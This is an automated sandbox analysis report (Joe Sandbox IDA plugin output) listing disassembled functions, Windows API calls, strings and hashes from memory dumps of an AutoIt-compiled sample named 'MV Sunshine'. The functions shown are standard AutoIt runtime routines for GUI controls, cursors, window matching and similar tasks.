AutoIt v3 GUI, xrefs: 00622974

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 57ca5c4079c0cf3807eab59e570fb8f20f8416b4cc384e65c47ec3ac8607eeb6
Instruction ID: 64f9c8706a7f2345c6efa7d1928fa968d3936e255212057e4a208d4007d5a7d0
Opcode Fuzzy Hash: 57ca5c4079c0cf3807eab59e570fb8f20f8416b4cc384e65c47ec3ac8607eeb6
Instruction Fuzzy Hash: 93B1AF70A0021AEFDB14DFA8DC95BEE7BB6FB18311F104229FA15A6290DB34E841CF51

Function 006A4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006A40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006A41B6

Strings

VIEWCHANGE, xrefs: 006A4375
ISSELECTED, xrefs: 006A41C1
GETSELECTEDCOUNT, xrefs: 006A4199
SELECTALL, xrefs: 006A421D
FINDITEM, xrefs: 006A4329
GETTEXT, xrefs: 006A415F
SELECTINVERT, xrefs: 006A4286
SELECT, xrefs: 006A4250
SELECTCLEAR, xrefs: 006A4235
GETSUBITEMCOUNT, xrefs: 006A4141
DESELECT, xrefs: 006A42A4
GETITEMCOUNT, xrefs: 006A4128
GETSELECTED, xrefs: 006A42E4

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 75a8bcf63ae57c132d2dc0e0b0fdaca0f730a1e5b4483ffaf77bb33869f6ad88
Instruction ID: a8704863f6fc68362260f4338e404df59ca6e7fae46ce1e2961abb051591d1a1
Opcode Fuzzy Hash: 75a8bcf63ae57c132d2dc0e0b0fdaca0f730a1e5b4483ffaf77bb33869f6ad88
Instruction Fuzzy Hash: 24A1AD306143119BDB54FF20C841AAAB7A7AFC5314F14896CB8969B392DF70ED0ACF55

Function 006952F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00695309
LoadCursorW.USER32(00000000,00007F8A), ref: 00695314
LoadCursorW.USER32(00000000,00007F00), ref: 0069531F
LoadCursorW.USER32(00000000,00007F03), ref: 0069532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00695335
LoadCursorW.USER32(00000000,00007F01), ref: 00695340
LoadCursorW.USER32(00000000,00007F81), ref: 0069534B
LoadCursorW.USER32(00000000,00007F88), ref: 00695356
LoadCursorW.USER32(00000000,00007F80), ref: 00695361
LoadCursorW.USER32(00000000,00007F86), ref: 0069536C
LoadCursorW.USER32(00000000,00007F83), ref: 00695377
LoadCursorW.USER32(00000000,00007F85), ref: 00695382
LoadCursorW.USER32(00000000,00007F82), ref: 0069538D
LoadCursorW.USER32(00000000,00007F84), ref: 00695398
LoadCursorW.USER32(00000000,00007F04), ref: 006953A3
LoadCursorW.USER32(00000000,00007F02), ref: 006953AE
GetCursorInfo.USER32(?), ref: 006953BE
GetLastError.KERNEL32(00000001,00000000), ref: 006953E9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: f9bdd8ad18b577768036b5c032a848c953e77c16edd151380eace73332dad1c0
Instruction ID: 977bde2adf35a0bbf71d33502c49c70fea0c3e9c1ac79a18a7e115649461ed30
Opcode Fuzzy Hash: f9bdd8ad18b577768036b5c032a848c953e77c16edd151380eace73332dad1c0
Instruction Fuzzy Hash: D9417170E043196ADF509FBA8C4986EFFFDEF51B10F10452FA509E7290DAB8A4018FA1

Function 0067AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0067AAA5
__swprintf.LIBCMT ref: 0067AB46
_wcscmp.LIBCMT ref: 0067AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0067ABAE
_wcscmp.LIBCMT ref: 0067ABEA
GetClassNameW.USER32(?,?,00000400), ref: 0067AC21
GetDlgCtrlID.USER32(?), ref: 0067AC73
GetWindowRect.USER32(?,?), ref: 0067ACA9
GetParent.USER32(?), ref: 0067ACC7
ScreenToClient.USER32(00000000), ref: 0067ACCE
GetClassNameW.USER32(?,?,00000100), ref: 0067AD48
_wcscmp.LIBCMT ref: 0067AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 0067AD82
_wcscmp.LIBCMT ref: 0067AD96

Part of subcall function 0064386C: _iswctype.LIBCMT ref: 00643874

Strings

%s%u, xrefs: 0067AB40

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: d9d12b4e55209336db5596a8a5dc1d9dbe3864f47ab94ce26aa58e35d7527e46
Instruction ID: 5bedc084c75846d7ce45767ab14bf90cbaa4668cd27981669be003e3c3d4e451
Opcode Fuzzy Hash: d9d12b4e55209336db5596a8a5dc1d9dbe3864f47ab94ce26aa58e35d7527e46
Instruction Fuzzy Hash: 47A1A171204606AFD729DFA4C884BEEB7AAFF84315F10862DF99D92250D730E945CB92

Function 0067B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0067B3DB
_wcscmp.LIBCMT ref: 0067B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0067B414
CharUpperBuffW.USER32(?,00000000), ref: 0067B431
_wcscmp.LIBCMT ref: 0067B44F
_wcsstr.LIBCMT ref: 0067B460
GetClassNameW.USER32(00000018,?,00000400), ref: 0067B498
_wcscmp.LIBCMT ref: 0067B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0067B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 0067B518
_wcscmp.LIBCMT ref: 0067B528
GetClassNameW.USER32(00000010,?,00000400), ref: 0067B550
GetWindowRect.USER32(00000004,?), ref: 0067B5B9

Strings

ThumbnailClass, xrefs: 0067B4A3, 0067B523
@, xrefs: 0067B3BC

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 768dacb45b3a87d47bd8f6a5a0c793039402a47ae85ecf8ebb11ea023d11fc4b
Instruction ID: f8e4aadbf2fe21abcee52ade861e3325937bfff5de0b75ada1887bd256a6222c
Opcode Fuzzy Hash: 768dacb45b3a87d47bd8f6a5a0c793039402a47ae85ecf8ebb11ea023d11fc4b
Instruction Fuzzy Hash: CF81AE710083059BEB04DF10D885FAA7BEAEF44314F08E56DFD899A296DB30DD49CBA1

Function 006AC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DragQueryPoint.SHELL32(?,?), ref: 006AC917

Part of subcall function 006AADF1: ClientToScreen.USER32(?,?), ref: 006AAE1A
Part of subcall function 006AADF1: GetWindowRect.USER32(?,?), ref: 006AAE90
Part of subcall function 006AADF1: PtInRect.USER32(?,?,006AC304), ref: 006AAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 006AC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006AC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006AC9AE
_wcscat.LIBCMT ref: 006AC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 006AC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 006ACA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 006ACA25
SendMessageW.USER32(?,000000B1,?,?), ref: 006ACA47
DragFinish.SHELL32(?), ref: 006ACA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006ACB41

Strings

prn, xrefs: 006ACA8B
@GUI_DRAGFILE, xrefs: 006ACAF0
@GUI_DROPID, xrefs: 006ACA6E
@GUI_DRAGID, xrefs: 006ACAB9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prn
API String ID: 169749273-2044922903
Opcode ID: f9e3960e6ac0d495a282e1ce02ba7b613de84795111c1c89b7e7b1feeda8cf31
Instruction ID: 219e94d1c90a9ea495bb92295c0e714489cbaceacf5ed6ff756f89a9c7689b52
Opcode Fuzzy Hash: f9e3960e6ac0d495a282e1ce02ba7b613de84795111c1c89b7e7b1feeda8cf31
Instruction Fuzzy Hash: 15617D71508301AFC711EF64DC85D9BBBEAEF89710F04091EF591962A1DB30AA09CFA6

Function 0067B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0067B23F

Strings

[CLASS:, xrefs: 0067B28F
[HANDLE:, xrefs: 0067B24B
ACTIVE, xrefs: 0067B21A
LAST, xrefs: 0067B204
HANDLE=, xrefs: 0067B238
[ALL, xrefs: 0067B2E5
CLASSNAME=, xrefs: 0067B27C
[REGEXPTITLE:, xrefs: 0067B267
ALL, xrefs: 0067B2D3
[LAST, xrefs: 0067B2EC
REGEXP=, xrefs: 0067B254
[ACTIVE, xrefs: 0067B22C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 8561ca81a14c69c73ea6de2b93229ca31ca2ce2c638793c13de68aae2b375b9c
Instruction ID: ecd12c60eef1bda8a01373a4425289f61aa46eb34463b0f735b05da88d70212f
Opcode Fuzzy Hash: 8561ca81a14c69c73ea6de2b93229ca31ca2ce2c638793c13de68aae2b375b9c
Instruction Fuzzy Hash: 2931D030A44215A6DB50FA60DD43FFE77B79F10750F20441EB415B22D2EF61AF04CA69

Function 0067C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0067C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0067C4E6
SetWindowTextW.USER32(?,?), ref: 0067C4FD
GetDlgItem.USER32(?,000003EA), ref: 0067C512
SetWindowTextW.USER32(00000000,?), ref: 0067C518
GetDlgItem.USER32(?,000003E9), ref: 0067C528
SetWindowTextW.USER32(00000000,?), ref: 0067C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0067C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0067C569
GetWindowRect.USER32(?,?), ref: 0067C572
SetWindowTextW.USER32(?,?), ref: 0067C5DD
GetDesktopWindow.USER32 ref: 0067C5E3
GetWindowRect.USER32(00000000), ref: 0067C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0067C636
GetClientRect.USER32(?,?), ref: 0067C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0067C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0067C693

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 05e8bf12655409b8011e89f68fbb643f8e87ba77ec7ebdf2aa50b27114bd3e4b
Instruction ID: 276edf7798572778550f43685826d1fc44f3411f47f9d252ec3cca4cfe617079
Opcode Fuzzy Hash: 05e8bf12655409b8011e89f68fbb643f8e87ba77ec7ebdf2aa50b27114bd3e4b
Instruction Fuzzy Hash: 83515D70900709AFDB20AFA8DD85BAEBBF6FB04715F00552CE686A26A0C775B914CF50

Function 006AA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006AA4C8
DestroyWindow.USER32(?,?), ref: 006AA542

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006AA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006AA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006AA5F1
DestroyWindow.USER32(00000000), ref: 006AA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00620000,00000000), ref: 006AA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006AA663
GetDesktopWindow.USER32 ref: 006AA67C
GetWindowRect.USER32(00000000), ref: 006AA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006AA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006AA6B3

Part of subcall function 006225DB: GetWindowLongW.USER32(?,000000EB), ref: 006225EC

Strings

tooltips_class32, xrefs: 006AA5B5, 006AA643
0, xrefs: 006AA4DE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: a69dc611e7786126557ecfb66a2e23e803fbf1edf9d913735ae31d1708c8b084
Instruction ID: 3f416e9550266728f9b804a31b32f915b9deb1475c9574d92818df24f55e3875
Opcode Fuzzy Hash: a69dc611e7786126557ecfb66a2e23e803fbf1edf9d913735ae31d1708c8b084
Instruction Fuzzy Hash: D6716A71140245AFD720EF68CC45FA67BE6EB9A300F08552EF985872A1D771ED02CF66

Function 006A4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 006A46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006A46F6

Strings

EXISTS, xrefs: 006A475F
GETTOTALCOUNT, xrefs: 006A46DD
GETTEXT, xrefs: 006A4849
EXPAND, xrefs: 006A47A8
ISCHECKED, xrefs: 006A4879
CHECK, xrefs: 006A4716
GETITEMCOUNT, xrefs: 006A47D8
GETSELECTED, xrefs: 006A4806
UNCHECK, xrefs: 006A48D2
SELECT, xrefs: 006A48A7
COLLAPSE, xrefs: 006A473C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d37c7f9aea0ce5627660119d282b3eacac0b205b63213b66f6cd8be2a590752b
Instruction ID: febaebdf41fa53cdee8db11a4850fe6246a9887cfc866044f4efa8edc3a97538
Opcode Fuzzy Hash: d37c7f9aea0ce5627660119d282b3eacac0b205b63213b66f6cd8be2a590752b
Instruction Fuzzy Hash: 06918C346047118FCB54EF10D851AAABBA3AF85314F04886DF8965B3A2CF71ED4ACF95

Function 006ABAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006ABB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006A9431), ref: 006ABBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006ABC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006ABC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006ABC7D
FreeLibrary.KERNEL32(?), ref: 006ABC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006ABC99
DestroyIcon.USER32(?,?,?,?,?,006A9431), ref: 006ABCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006ABCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006ABCD1

Part of subcall function 0064313D: __wcsicmp_l.LIBCMT ref: 006431C6

Strings

.icl, xrefs: 006ABAE4
.dll, xrefs: 006ABB27
.exe, xrefs: 006ABB04

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: ccfbf9a3c41e28945a39788906f0965622e5a52af6abc9180fbda5ce446b4299
Instruction ID: f0bc7cb714d145f4899a18f4a142e005b425f926ee88656bab1b888c0cf12166
Opcode Fuzzy Hash: ccfbf9a3c41e28945a39788906f0965622e5a52af6abc9180fbda5ce446b4299
Instruction Fuzzy Hash: 7661EF71900219BAEB14EF64CC41FFA77AAEB09721F105219F816D62D2DB74AD90CFA0

Function 0068A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,006AFB78), ref: 0068A0FC

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

LoadStringW.USER32(?,?,00000FFF,?), ref: 0068A11E
__swprintf.LIBCMT ref: 0068A177
__swprintf.LIBCMT ref: 0068A190
_wprintf.LIBCMT ref: 0068A246
_wprintf.LIBCMT ref: 0068A264

Strings

Line %d (File "%s"):, xrefs: 0068A171, 0068A18A
"%s" (%d) : ==> %s:, xrefs: 0068A25F
^ ERROR, xrefs: 0068A1E8
Error: , xrefs: 0068A20E
%k, xrefs: 0068A0C9
"%s" (%d) : ==> %s:%s%s, xrefs: 0068A241

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%k
API String ID: 311963372-3215148653
Opcode ID: 02768259816a36af3ffb6f86727f330db08e4f917f11822237c87bf2088b8f7e
Instruction ID: 10d41a3374f5a7411ca524082470b2e49d0b4cf4fc21095c0ef6ef2f05fc5d12
Opcode Fuzzy Hash: 02768259816a36af3ffb6f86727f330db08e4f917f11822237c87bf2088b8f7e
Instruction Fuzzy Hash: EA51BE3180061AAADF65FBE0DD96EEEB77AAF04300F14016AF505721A1EB312F48DF65

Function 0068A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

CharLowerBuffW.USER32(?,?), ref: 0068A636
GetDriveTypeW.KERNEL32 ref: 0068A683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0068A730

Part of subcall function 00627D2C: _memmove.LIBCMT ref: 00627D66

Strings

open, xrefs: 0068A65D
close cd wait, xrefs: 0068A71B
wait, xrefs: 0068A6ED
type cdaudio alias cd wait, xrefs: 0068A6AE
closed, xrefs: 0068A64A, 0068A653
set cd door , xrefs: 0068A6D1
open , xrefs: 0068A692
close, xrefs: 0068A63C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 84b26023721b2b811b0b23dd3aa4a5a820bf0838cc2ede3dfc524d42f71471f3
Instruction ID: de9833533744d1f12ada710058387fa098871622c47bc2c2298f8c643ddf5b6c
Opcode Fuzzy Hash: 84b26023721b2b811b0b23dd3aa4a5a820bf0838cc2ede3dfc524d42f71471f3
Instruction Fuzzy Hash: 745168715087149FD740EF20D881C6AB7E6EF84318F04496DF88657261DB31EE0ACF52

Function 0068A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0068A47A
